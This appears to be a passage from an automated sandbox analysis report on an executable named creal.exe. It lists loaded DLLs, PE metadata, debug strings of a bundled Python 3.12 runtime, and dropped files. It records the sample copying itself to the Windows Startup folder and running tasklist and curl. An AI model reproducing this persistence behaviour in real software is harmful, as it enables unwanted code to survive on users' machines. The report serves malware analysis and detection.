            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\curl.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\curl.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\curl.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\curl.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\creal.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: creal.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: creal.exeStatic file information: File size 17171619 > 1048576
            Source: creal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: creal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: creal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: creal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: creal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: creal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: creal.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: creal.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: D:\a\1\b\bin\amd64\python312.pdb source: creal.exe, 00000002.00000002.1584456751.00007FF8E7BD3000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: creal.exe, 00000002.00000002.1579097857.00007FF8E712F000.00000002.00000001.01000000.00000019.sdmp
            Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.11 19 Sep 20233.0.11built on: Wed Sep 27 22:33:28 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: creal.exe, 00000002.00000002.1582537332.00007FF8E7642000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: creal.exe, 00000002.00000002.1582537332.00007FF8E7642000.00000002.00000001.01000000.00000011.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_overlapped.pdb source: creal.exe, 00000002.00000002.1588731612.00007FF8F7A06000.00000002.00000001.01000000.00000014.sdmp, creal.exe, 0000001A.00000003.1544118293.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: creal.exe, 00000000.00000003.1371953608.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1590369480.00007FF8F8BC3000.00000002.00000001.01000000.00000005.sdmp, creal.exe, 0000001A.00000003.1541448676.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: creal.exe, 00000000.00000003.1371953608.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1590369480.00007FF8F8BC3000.00000002.00000001.01000000.00000005.sdmp, creal.exe, 0000001A.00000003.1541448676.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: creal.exe, 00000002.00000002.1574380417.00007FF8E69DC000.00000002.00000001.01000000.0000001B.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: creal.exe, 0000001A.00000003.1543955907.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: creal.exe, 00000000.00000003.1372232763.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1541833635.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: creal.exe, 00000002.00000002.1589596642.00007FF8F8303000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: creal.exe, 00000002.00000002.1589772887.00007FF8F8751000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: creal.exe, 00000002.00000002.1580095250.00007FF8E7177000.00000002.00000001.01000000.00000016.sdmp, creal.exe, 0000001A.00000003.1543399953.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\libssl-3.pdbEE source: creal.exe, 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: creal.exe, 00000002.00000002.1587898705.00007FF8E802C000.00000002.00000001.01000000.0000000A.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_asyncio.pdb source: creal.exe, 00000000.00000003.1372380110.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1587254717.00007FF8E7FA8000.00000002.00000001.01000000.00000013.sdmp, creal.exe, 0000001A.00000003.1542028020.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_uuid.pdb source: creal.exe, 00000002.00000002.1574615880.00007FF8E6EF2000.00000002.00000001.01000000.0000002D.sdmp, creal.exe, 0000001A.00000003.1545277030.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\pyexpat.pdb source: creal.exe, 00000002.00000002.1580428919.00007FF8E71B2000.00000002.00000001.01000000.00000015.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: creal.exe, 00000002.00000002.1589350978.00007FF8F7EC3000.00000002.00000001.01000000.0000000E.sdmp, creal.exe, 0000001A.00000003.1544286288.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: creal.exe, 00000002.00000002.1587898705.00007FF8E802C000.00000002.00000001.01000000.0000000A.sdmp, creal.exe, 0000001A.00000003.1543628592.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: creal.exe, 00000000.00000003.1372510190.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 00000002.00000002.1589012234.00007FF8F7A9D000.00000002.00000001.01000000.00000009.sdmp, creal.exe, 0000001A.00000003.1542237696.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: creal.exe, 00000002.00000002.1590664825.00007FF8F8D84000.00000002.00000001.01000000.0000000B.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: creal.exe, 00000002.00000002.1587570318.00007FF8E7FF9000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: creal.exe, 00000002.00000002.1578860238.00007FF8E700F000.00000002.00000001.01000000.0000001A.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb''&GCTL source: creal.exe, 00000002.00000002.1590664825.00007FF8F8D84000.00000002.00000001.01000000.0000000B.sdmp, creal.exe, 0000001A.00000003.1545461593.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: creal.exe, 00000002.00000002.1555010440.00000185BB290000.00000002.00000001.01000000.00000006.sdmp
            Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: creal.exe, 00000000.00000003.1372232763.0000018FDF26A000.00000004.00000020.00020000.00000000.sdmp, creal.exe, 0000001A.00000003.1541833635.0000025EFD905000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\1\b\libssl-3.pdb source: creal.exe, 00000002.00000002.1580838537.00007FF8E7255000.00000002.00000001.01000000.00000012.sdmp
            Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: creal.exe, 00000002.00000002.1583452111.00007FF8E77AD000.00000002.00000001.01000000.00000010.sdmp
            Source: creal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: creal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: creal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: creal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: creal.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: VCRUNTIME140_1.dll.0.drStatic PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
            Source: creal.exeStatic PE information: section name: _RDATA
            Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
            Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
            Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
            Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
            Source: python312.dll.0.drStatic PE information: section name: PyRuntim
            Source: creal.exe.2.drStatic PE information: section name: _RDATA
            Source: VCRUNTIME140.dll.26.drStatic PE information: section name: fothk
            Source: VCRUNTIME140.dll.26.drStatic PE information: section name: _RDATA
            Source: libcrypto-3.dll.26.drStatic PE information: section name: .00cfg
            Source: libssl-3.dll.26.drStatic PE information: section name: .00cfg
            Source: python312.dll.26.drStatic PE information: section name: PyRuntim
            Source: C:\Users\user\Desktop\creal.exeCode function: 0_2_00007FF67A64506C push rcx; iretd 0_2_00007FF67A64506D
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E68F161E push rdx; iretd 2_2_00007FF8E68F1621
            Source: C:\Users\user\Desktop\creal.exeCode function: 2_2_00007FF8E71F4541 push rcx; ret 2_2_00007FF8E71F4542
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 26_2_00007FF7C3D2506C push rcx; iretd 26_2_00007FF7C3D2506D
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8E59B161E push rdx; iretd 28_2_00007FF8E59B1621
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeCode function: 28_2_00007FF8F8491D7B push rcx; retf 28_2_00007FF8F8491D7C
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_chacha20.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\charset_normalizer\md.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_Salsa20.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_ghash_portable.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\libssl-3.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_BLAKE2s.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_poly1305.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_socket.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ofb.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_bz2.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\VCRUNTIME140_1.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA384.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\bcrypt\_bcrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_BLAKE2b.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA256.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cfb.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA512.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\pyexpat.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\libcrypto-3.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\VCRUNTIME140.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_decimal.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\bcrypt\_bcrypt.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_hashlib.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_socket.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\python312.dllJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_queue.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ocb.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Util\_strxor.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ed25519.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_des.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD5.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Math\_modexp.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_aes.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_ssl.pydJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\_asyncio.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ctr.pydJump to dropped file
            Source: C:\Users\user\Desktop\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75242\libffi-8.dllJump to dropped file
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_Salsa20.pydJump to dropped file
